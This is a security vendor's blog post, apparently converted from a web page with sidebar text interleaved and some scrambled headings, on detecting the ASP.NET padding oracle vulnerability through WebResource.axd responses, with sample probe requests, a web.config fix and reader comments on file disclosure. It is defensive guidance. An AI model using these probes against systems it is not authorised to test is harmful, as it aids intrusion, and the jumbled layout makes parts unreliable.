Pricing

News

Partners

Support

A bout us

Contact

AVbk Seiec WRg ytuai cosa xbH ur in Cb am tn t nb 8 iW n l a e a c A k tt s

February 16, 2012 10:12 pm | 2 Comments

Read the full story

releases
Acunetix Web Vulnerability Scanner Product Releases

docs & faqs

Acunetix technical documentation and FAQ

news
Acunetix Company and Web Security news, & Press Releases

events
Acunetix Webinars, Events and Training around the world

web security zone

Everything you need to know about Web Security

Home articles, news, web security zone

docs & F AQs F How Can I Scan Large Websites with Multiple AQ: Instances of Acunetix Web Vulnerability Scanner?
In order to save time scanning websites, you can run multiple instances of Acunetix Web Vulnerability Scanner (up to two instances with the Small Business Edition, or up to 10 instances with the Consultant and More articles

hscrw euyo tvliafe oinck tepi not atp buc rilh lH o APn Syd Naa Pdi .Te EO tn iu V g lb c r
Submitted by Bogdan Calin on September 22, 2010 5:04 pm 9 Comments

Everybodys talking about the ASP.NET Padding Oracle vulnerability released a few days ago at the ekoparty Security Conference. However, until now there wasnt enough information on how do you check if your application is vulnerable or not. Yesterday, Duncan Smart from ASP.NET forums published some very useful information that allows us to do that. An application is vulnerable to a padding oracle attack if it responds differently in the following three cases: 1. When a valid ciphertext is received (one that is properly padded and contains valid data). 2. When an invalid ciphertext is received (one that is not properly padded). 3. When a valid ciphertext is received (properly padded) but the decrypted value is not valid for the application. If you want to know more about padding oracles, a very good resource is Automated Padding Oracle Attacks with PadBuster. How do we apply this to ASP.NET? The key to attacking ASP.NET is the file WebResource.axd. This file is also used in the exploit video released by Juliano Rizzo. This file can be used as a Padding Oracle because it responds differently in all three cases. Here are the three cases. 1. valid ciphertext Make a request like http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA2 The response status is 200 OK and the response body is the content of the web resource youve requested (some javascript code in my case). events

Acunetix to Be Exhibited at | Detroit Tech-Security Conference

On April 5th 2012, Jacadis, Acunetixs reseller in Ohio, USA, will be sponsoring the Detroit Tech-Security Conference and exhibiting Acunetix Web Vulnerability Scanner. This conference is part of a series of high-quality executive symposiums that are More articles

news Acunetix Web Vulnerability Scanner Voted WindowSecurity.com Readers Choice Award Winner of 2012
Acunetix Web Vulnerability Scanner Wins the WindowSecurity.com Readers Choice Award for the Fifth Successive Year Leading Windows Security resource site, WindowSecurity.com, has announced that Acunetix Web Vulnerability Scanner has been selected as the winner of the More articles

releases Acunetix Web Vulnerability Scanner Introduces New Security Check for PHP-CGI Installations
We are pleased to announce an updated build of Acunetix Web Vulnerability Scanner 8 (WVS 8). Build number 20120508 includes a number of new scheduler features, a new security check for PHP-CGI, as well as More articles

web security zone 2. invalid ciphertext Make a request like http://website.com/application/WebResource.axd?d=acunetix The response status is 500 Internal Server Error and the response body is some error message. Web Application Firewalls and the False Sense of Security They can Create
Web Application Firewalls (WAFs) are an excellent last line of defense. Based on what I see in my testing theyre great at blocking both automated scans and granular exploits like Cross-Site Scripting and SQL injection.
converted by Web2PDFConvert.com

and SQL injection. More articles

Archive 3.valid ciphertext but invalid data Make a request like http://website.com/application/WebResource.axd?d= The response status is 404 Not Found and the response body is some error message.
May 2012 April 2012 March 2012 February 2012 January 2012 December 2011

Links
Acunetix Forums Darknet.org.uk JACADIS Thought Nick on IT WebsiteDefender.com

Get notified of new blog posts by email

Enter your email address:

This is the padding oracle that allows an attacker to exploit this vulnerability. If your application responds differently in all of these three cases, its vulnerable. Very important: Setting CustomErrors to On or RemoteOnly (in web.config) doesnt solve this problem because the padding oracle is still there (the error message displayed on the 500 error page is not important for this vulnerability). Therefore, the only solution is the one presented by Scott Guthrie. Edit web.config to use redirectMode set to ResponseRewrite and defaultRedirect to an error page defined by you.
1 <configuration> 2 <system.web> 3 <customerrors mode="On" redirectmode="ResponseRewrite" defaultredirect="~/error.aspx"> 4 </customerrors></system.web> 5 </configuration>

Subscribe

Delivered by FeedBurner

Join Acunetix on Facebook

Acunetix on Facebook
Like 1,518 people like Acunetix.

A hmad

Baak

Lex

Ilias

Nero

Once this workaround is applied, the application will return the same status code and response body in all three cases. If you are using .NET Framework version 3.5 SP1 or 4.0, its even better.
F acebook social plugin

If you are using .NET Framework version 3.5 SP1 or 4.0, the workaround provides further protection by also helping to mitigate against potential timing analysis attacks. The workaround uses the redirectMode=ResponseRewrite option in the customErrors feature, and introduces a random delay in the error page. These approaches work together to make it more difficult for an attacker to deduce the type of error that occurred on the server by measuring the time it took to receive the error.

Acunetix on Twitter
You need more than a WAF to ensure your #websecurity. Here are some additional measures you need to take http://t.co/Ugb3us4b #acunetix 02:08:23 PM May 10, 2012 from web ReplyRetweetFavorite A new build of #Acunetix WVS8 has been released! Check whats new in Acunetix WVS8 and how to upgrade to build 20120508 http://t.co/ZqmLyJIB 12:23:42 PM May 08, 2012 from web ReplyRetweetFavorite Learn how to scan large websites more efficiently using the #Acunetix Web Vulnerability Scanner http://t.co/GuNwlsb9 03:19:47 PM May 03, 2012 from web ReplyRetweetFavorite #Acunetix Web Vulnerability Scanner offers you the possibility of scanning multiple websites simultaneously http://t.co/B7dyOSN4 01:18:22 PMApril 26, 2012 from web ReplyRetweetFavorite

Today weve released an update for Acunetix WVS that is automatically checks if your application is vulnerable or not to this ASP.NET vulnerability.

Follow Acunetix on

9 Comments

Calandale says:
September 22, 2010 at 11:10 pm

The microsoft advisory implies that this vulnerability can be exploited to ends other than merely

converted by Web2PDFConvert.com

decrypting application information. In particular, disclosure of files on the system itself. Has anyone investigated this claim? If this is indeed exploitable, this is a situation which is far more worrisome than the exploit which was demonstrated. Too, this tool doesnt reflect the observation that Thai Duong made which is that the actual response codes are unnecessary, timing attacks can give the same information.

Acunetix WVS Version 7 build 20100921 released | Acunetix Web Application Security Blog says: September 22, 2010 at 11:29 pm [...] bug fixes, this build will also automatically check for the latest OpenX OFC file upload and the ASP.NET padding Oracle [...]

TheTestManager says:
September 22, 2010 at 11:39 pm

Are you aware if by using ResponseRewrite and defaultRedirect it is still possible to carry out Oracle Padding using the response status codes instead of the response body? This way attackers could still look for status response codes 302 which would happen on the non-valid ciphertext as you get redirected to the new custom error. which would then give a 200? Or does the setting of responserewrite and defaultredirect get around that possible attack scenario?

Bogdan Calin says:

September 23, 2010 at 3:12 am

@Calandale Yes, from my understanding its possible to read the contents of any file from the application directory. The WebResource.axd file can be used to do exactly that. You have to prepare the right value for the d parameter (this parameter specifies what resource/file you want to read). You can do that after youve recovered the encryption key. The workaround that uses the redirectMode=ResponseRewrite option in the customErrors feature introduces a random delay in the error page. Therefore, timing attacks dont work anymore.

Bogdan Calin says:

September 23, 2010 at 3:18 am

@TheTestManager From my tests, after youve configured ResponseRewrite and defaultRedirect there are no redirects (301/302) to the custom error page. I just see a 200 status code. Our tool (HTTP Editor) doesnt automatically follow redirects.

Vulnerabilidad Padding Oracle en ASP.NET WillyXoft says: September 23, 2010 at 10:53 am [...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability [...] Week 38 in Review 2010 | Infosec Events says: September 27, 2010 at 7:42 pm [...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability acunetix.com [...]

Soroush says:
September 27, 2010 at 11:33 pm

In Case 3 valid ciphertext but invalid data (When a valid ciphertext is received (properly padded) but the decrypted value is not valid for the application.), is it the same to change only 1 letter of a valid cipher to an invalid one? For example, can we use this one: http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA1 when the valid one is: http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA2 (Ive changed jzjghMVYzFihd9Uhe_arpA2 to jzjghMVYzFihd9Uhe_arpA1) ? Thanks

ASP.NET Padding Oracle | The Chronicles of Jon says: October 7, 2010 at 5:20 am
converted by Web2PDFConvert.com

[...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability [...]

Leave a comment! Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS. Be nice. Keep it clean. Stay on topic. No spam. Name (required) Mail (will not be published) (required) Website (optional)

You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.
Submit Comment

recent posts
Web Application Firewalls and the False Sense of Security They can Create Acunetix Web Vulnerability Scanner Introduces New Security Check for PHP-CGI Installations FAQ: How Can I Scan Large Websites with Multiple Instances of Acunetix Web Vulnerability Scanner? FAQ: How do I Scan Multiple Websites with Acunetix Web Vulnerability Scanner? Acunetix Web Vulnerability Scanner Voted WindowSecurity.com Readers Choice Award Winner of 2012

most commented
Statistics from 10,000 leaked Hotmail passwords HTTP Post Denial Of Service: more dangerous than initially thought Latest Comparison Report from Larry Suto CubeCart 4 session management bypass leads to administrator access Changes coming to the OWASP Top 10 in 2010

categories
docs & FAQs events featured news releases web security zone articles whitepapers

Powered by WordPress | Log in | Entries (RSS) | Comments (RSS) | Arthemia Premium theme by Colorlabs Project

converted by Web2PDFConvert.com